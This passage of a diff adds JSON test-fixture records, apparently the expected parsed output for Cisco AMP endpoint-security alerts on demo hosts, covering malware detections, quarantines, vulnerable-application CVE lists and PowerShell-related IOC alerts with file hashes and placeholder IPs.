"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 33023, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:27:10.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648173, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 579890366, + "event.action": "File Fetch Completed", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508191586038317000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "file.hash.md5": "41476df3138717868118d8542cf3d1d6", + "file.hash.sha1": "5ca4bef8de6def53519d4b22632675bb4c1e470b", + "file.hash.sha256": "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "file.name": "resume.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "host.os.family": "windows", + "host.os.platform": "windows", + "input.type": "log", + "log.offset": 34132, + "related.hash": [ + "6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86", + "41476df3138717868118d8542cf3d1d6", + "5ca4bef8de6def53519d4b22632675bb4c1e470b" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T00:02:08.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 614000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6583671182384431000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 35358, + "related.hosts": [ + "Demo_AMP_MAP_FriedEx" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411132837046517762", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260893, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 695000000, + "event.action": "Retrospective Quarantine Attempt Failed", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 36288, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T15:36:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "f9:65:da:22:2a:41" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6411132837046517761", + "cisco.amp.event_type_id": 553648155, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "f9:65:da:22:2a:41" + ], + "cisco.amp.timestamp_nanoseconds": 691000000, + "event.action": "Retrospective Quarantine", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6411132837046518000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "file.hash.sha256": "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960", + "fileset.name": "amp", + "host.hostname": "Demo_Qakbot_1", + "host.name": "Demo_Qakbot_1", + "input.type": "log", + "log.offset": 37489, + "related.hash": [ + "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" + ], + "related.hosts": [ + "Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:37:33.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2014-0260", + "CVE-2014-1761", + "CVE-2014-6357", + "CVE-2015-0085", + "CVE-2015-0086", + "CVE-2015-1641", + "CVE-2015-1650", + "CVE-2015-1682", + "CVE-2015-2379", + "CVE-2015-2380", + "CVE-2015-2424", + "CVE-2016-0127", + "CVE-2016-7193", + "CVE-2017-0292", + "CVE-2017-11826" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2014-0260", + "name": "Microsoft Office", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260", + "version": "2013" + }, + { + "cve": "CVE-2014-1761", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761" + }, + { + "cve": "CVE-2014-6357", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357" + }, + { + "cve": "CVE-2015-0085", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085" + }, + { + "cve": "CVE-2015-0086", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086" + }, + { + "cve": "CVE-2015-1641", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641" + }, + { + "cve": "CVE-2015-1650", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650" + }, + { + "cve": "CVE-2015-1682", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682" + }, + { + "cve": "CVE-2015-2379", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379" + }, + { + "cve": "CVE-2015-2380", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380" + }, + { + "cve": "CVE-2015-2424", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424" + }, + { + "cve": "CVE-2016-0127", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127" + }, + { + "cve": "CVE-2016-7193", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193" + }, + { + "cve": "CVE-2017-0292", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292" + }, + { + "cve": "CVE-2017-11826", + "score": "9.3", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826" + } + ], + "event.action": "Vulnerable Application Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 15152998206589, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2021-01-13T10:37:33.000Z", + "file.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "file.name": "WINWORD.EXE", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 41214, + "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef", + "related.hash": [ + "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:23:35.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 349000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6508159571352093000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 44193, + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:13:13.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 312509000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1515298360312529000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-13T10:13:13.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "PowerShell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 45111, + "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:13:08.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 162019000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1515298355162029000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-13T10:13:08.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "PowerShell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 46862, + "process.hash.sha256": "3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-13T10:00:07.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "38:1e:eb:ba:2c:15" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6508153524038139905", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "38:1e:eb:ba:2c:15" + ], + "cisco.amp.timestamp_nanoseconds": 606000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6508153524038140000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef", + "fileset.name": "amp", + "host.hostname": "Demo_AMP", + "host.name": "Demo_AMP", + "input.type": "log", + "log.offset": 48509, + "related.hash": [ + "4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef" + ], + "related.hosts": [ + "Demo_AMP" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-12T10:24:47.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 693632000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521062325693667300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2021-01-12T10:24:47.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 49613, + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-12T10:15:22.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "d2:78:15:4a:f4:a2" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "d2:78:15:4a:f4:a2" + ], + "cisco.amp.timestamp_nanoseconds": 872000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6532910514396201000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Exploit_Prevention_Audit", + "host.name": "Demo_AMP_Exploit_Prevention_Audit", + "input.type": "log", + "log.offset": 51389, + "related.hosts": [ + "Demo_AMP_Exploit_Prevention_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:49:09.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.GenericKD:Malwaregen.21do.1201", + "cisco.amp.detection_id": "6525520937264087041", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 661000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525520937264087000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "cfdd16225e67471f5ef54cab9b3a5558", + "file.hash.sha1": "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c", + "file.hash.sha256": "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "file.name": "OLD.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 52332, + "process.hash.md5": "38ae1b3c38faef56fe4907922f0385ba", + "process.hash.sha1": "84123a3decdaa217e3588a1de59fe6cee1998004", + "process.hash.sha256": "d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef", + "process.name": "explorer.exe", + "process.pid": 2632, + "related.hash": [ + "edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9", + "cfdd16225e67471f5ef54cab9b3a5558", + "26de43cc558a4e0e60eddd4dc9321bcb5a0a181c" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:44.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Auto.F2863A.211556.in02", + "cisco.amp.detection_id": "6525516191325224961", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 500000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6525516191325225000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "c624d61b8f076c3ef05f74eeb96c8954", + "file.hash.sha1": "7d9518ea3f98d037745352b23861fab05d3777dc", + "file.hash.sha256": "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "file.name": "twhy.exe", + "file.path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 55057, + "process.hash.md5": "92f44e405db16ac55d97e3bfe3b132fa", + "process.hash.sha1": "04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d", + "process.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "process.name": "powershell.exe", + "process.pid": 4868, + "related.hash": [ + "f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117", + "c624d61b8f076c3ef05f74eeb96c8954", + "7d9518ea3f98d037745352b23861fab05d3777dc" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:41.000Z", + "cisco.amp.cloud_ioc.description": "PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.", + "cisco.amp.cloud_ioc.short_description": "W32.PowershellDownloadedExecutable.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 516130000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1519340132516139000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 3, + "event.start": "2020-12-25T05:30:41.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 57784, + "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:30:41.000Z", + "cisco.amp.cloud_ioc.description": "Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.", + "cisco.amp.cloud_ioc.short_description": "W32.WinWord.Powershell", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 474861000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1519340132474871000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2020-12-25T05:30:41.000Z", + "file.hash.sha256": "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7", + "file.name": "powershell.exe", + "file.path": "/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Intel", + "host.name": "Demo_AMP_Intel", + "input.type": "log", + "log.offset": 59541, + "process.hash.sha256": "664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7", + "related.hash": [ + "6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7" + ], + "related.hosts": [ + "Demo_AMP_Intel" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2020-12-25T05:02:27.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "e6:44:a0:56:f3:9a" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296279, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.cve": [ + "CVE-2018-0762", + "CVE-2018-0772" + ], + "cisco.amp.related.mac": [ + "e6:44:a0:56:f3:9a" + ], + "cisco.amp.timestamp_nanoseconds": 0, + "cisco.amp.vulnerabilities": [ + { + "cve": "CVE-2018-0762", + "name": "Microsoft Internet Explorer", + "score": "7.6", + "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762", + "version": "11" + }, 